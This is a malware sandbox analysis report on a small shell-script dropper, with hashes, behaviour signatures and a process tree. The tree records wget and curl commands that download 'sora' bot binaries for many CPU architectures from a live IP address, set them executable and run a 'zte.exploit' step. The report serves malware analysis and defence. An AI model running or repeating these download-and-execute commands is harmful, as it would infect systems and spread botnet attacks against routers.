Analysis

  • max time kernel
    11s
  • max time network
    12s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    18/10/2024, 03:05

General

  • Target

    f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh

  • Size

    2KB

  • MD5

    5ee0ae1a52cdb3d257932d6b048f6846

  • SHA1

    074cd5bc461923829a352d3d3b74ca92b72e030a

  • SHA256

    f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70

  • SHA512

    7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • Checks CPU configuration 1 TTPs 14 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
    /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
    1⤵
    • Writes file to tmp directory
    PID:637
    • /usr/bin/wget
      wget http://93.123.85.141/bins/sora.x86
      2⤵
        PID:639
      • /usr/bin/curl
        curl -O http://93.123.85.141/bins/sora.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:649
      • /bin/cat
        cat sora.x86
        2⤵
          PID:658
        • /bin/chmod
          chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
          2⤵
          • File and Directory Permissions Modification
          PID:660
        • /tmp/robben
          ./robben zte.exploit
          2⤵
          • Executes dropped EXE
          PID:663
        • /usr/bin/wget
          wget http://93.123.85.141/bins/sora.mips
          2⤵
          • System Network Configuration Discovery
          PID:665
        • /usr/bin/curl
          curl -O http://93.123.85.141/bins/sora.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:669
        • /bin/cat
          cat sora.mips
          2⤵
          • System Network Configuration Discovery
          PID:673
        • /bin/chmod
          chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
          2⤵
          • File and Directory Permissions Modification
          PID:675
        • /tmp/robben
          ./robben zte.exploit
          2⤵
          • Executes dropped EXE
          PID:676
        • /usr/bin/wget
          wget http://93.123.85.141/bins/sora.x86_64
          2⤵
            PID:679
          • /usr/bin/curl
            curl -O http://93.123.85.141/bins/sora.x86_64
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            PID:681
          • /bin/cat
            cat sora.x86_64
            2⤵
              PID:682
            • /bin/chmod
              chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
              2⤵
              • File and Directory Permissions Modification
              PID:683
            • /tmp/robben
              ./robben zte.exploit
              2⤵
              • Executes dropped EXE
              PID:684
            • /usr/bin/wget
              wget http://93.123.85.141/bins/sora.i468
              2⤵
                PID:686
              • /usr/bin/curl
                curl -O http://93.123.85.141/bins/sora.i468
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                PID:687
              • /bin/cat
                cat sora.i468
                2⤵
                  PID:688
                • /bin/chmod
                  chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                  2⤵
                  • File and Directory Permissions Modification
                  PID:689
                • /tmp/robben
                  ./robben zte.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:690
                • /usr/bin/wget
                  wget http://93.123.85.141/bins/sora.i686
                  2⤵
                    PID:692
                  • /usr/bin/curl
                    curl -O http://93.123.85.141/bins/sora.i686
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    PID:693
                  • /bin/cat
                    cat sora.i686
                    2⤵
                      PID:696
                    • /bin/chmod
                      chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                      2⤵
                      • File and Directory Permissions Modification
                      PID:698
                    • /tmp/robben
                      ./robben zte.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:699
                    • /usr/bin/wget
                      wget http://93.123.85.141/bins/sora.mpsl
                      2⤵
                        PID:702
                      • /usr/bin/curl
                        curl -O http://93.123.85.141/bins/sora.mpsl
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        PID:705
                      • /bin/cat
                        cat sora.mpsl
                        2⤵
                          PID:708
                        • /bin/chmod
                          chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                          2⤵
                          • File and Directory Permissions Modification
                          PID:710
                        • /tmp/robben
                          ./robben zte.exploit
                          2⤵
                          • Executes dropped EXE
                          PID:711
                        • /usr/bin/wget
                          wget http://93.123.85.141/bins/sora.arm4
                          2⤵
                            PID:714
                          • /usr/bin/curl
                            curl -O http://93.123.85.141/bins/sora.arm4
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            PID:717
                          • /bin/cat
                            cat sora.arm4
                            2⤵
                              PID:720
                            • /bin/chmod
                              chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                              2⤵
                              • File and Directory Permissions Modification
                              PID:722
                            • /tmp/robben
                              ./robben zte.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:724
                            • /usr/bin/wget
                              wget http://93.123.85.141/bins/sora.arm5
                              2⤵
                                PID:726
                              • /usr/bin/curl
                                curl -O http://93.123.85.141/bins/sora.arm5
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                PID:729
                              • /bin/cat
                                cat sora.arm5
                                2⤵
                                  PID:732
                                • /bin/chmod
                                  chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:733
                                • /tmp/robben
                                  ./robben zte.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:735
                                • /usr/bin/wget
                                  wget http://93.123.85.141/bins/sora.arm6
                                  2⤵
                                    PID:737
                                  • /usr/bin/curl
                                    curl -O http://93.123.85.141/bins/sora.arm6
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    PID:740
                                  • /bin/cat
                                    cat sora.arm6
                                    2⤵
                                      PID:744
                                    • /bin/chmod
                                      chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:745
                                    • /tmp/robben
                                      ./robben zte.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:747
                                    • /usr/bin/wget
                                      wget http://93.123.85.141/bins/sora.arm7
                                      2⤵
                                        PID:749
                                      • /usr/bin/curl
                                        curl -O http://93.123.85.141/bins/sora.arm7
                                        2⤵
                                        • Checks CPU configuration
                                        • Reads runtime system information
                                        PID:754
                                      • /bin/cat
                                        cat sora.arm7
                                        2⤵
                                          PID:769
                                        • /bin/chmod
                                          chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:770
                                        • /tmp/robben
                                          ./robben zte.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:771
                                        • /usr/bin/wget
                                          wget http://93.123.85.141/bins/sora.ppc
                                          2⤵
                                            PID:773
                                          • /usr/bin/curl
                                            curl -O http://93.123.85.141/bins/sora.ppc
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            PID:774
                                          • /bin/cat
                                            cat sora.ppc
                                            2⤵
                                              PID:775
                                            • /bin/chmod
                                              chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:776
                                            • /tmp/robben
                                              ./robben zte.exploit
                                              2⤵
                                              • Executes dropped EXE
                                              PID:777
                                            • /usr/bin/wget
                                              wget http://93.123.85.141/bins/sora.ppc440fp
                                              2⤵
                                                PID:780
                                              • /usr/bin/curl
                                                curl -O http://93.123.85.141/bins/sora.ppc440fp
                                                2⤵
                                                • Checks CPU configuration
                                                • Reads runtime system information
                                                PID:783
                                              • /bin/cat
                                                cat sora.ppc440fp
                                                2⤵
                                                  PID:787
                                                • /bin/chmod
                                                  chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:788
                                                • /tmp/robben
                                                  ./robben zte.exploit
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:790
                                                • /usr/bin/wget
                                                  wget http://93.123.85.141/bins/sora.m68k
                                                  2⤵
                                                    PID:792
                                                  • /usr/bin/curl
                                                    curl -O http://93.123.85.141/bins/sora.m68k
                                                    2⤵
                                                    • Checks CPU configuration
                                                    • Reads runtime system information
                                                    PID:795
                                                  • /bin/cat
                                                    cat sora.m68k
                                                    2⤵
                                                      PID:799
                                                    • /bin/chmod
                                                      chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:800
                                                    • /tmp/robben
                                                      ./robben zte.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:801
                                                    • /usr/bin/wget
                                                      wget http://93.123.85.141/bins/sora.sh4
                                                      2⤵
                                                        PID:804
                                                      • /usr/bin/curl
                                                        curl -O http://93.123.85.141/bins/sora.sh4
                                                        2⤵
                                                        • Checks CPU configuration
                                                        • Reads runtime system information
                                                        PID:808
                                                      • /bin/cat
                                                        cat sora.sh4
                                                        2⤵
                                                          PID:812
                                                        • /bin/chmod
                                                          chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M
                                                          2⤵
                                                          • File and Directory Permissions Modification
                                                          PID:814
                                                        • /tmp/robben
                                                          ./robben zte.exploit
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:815

                                                      Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads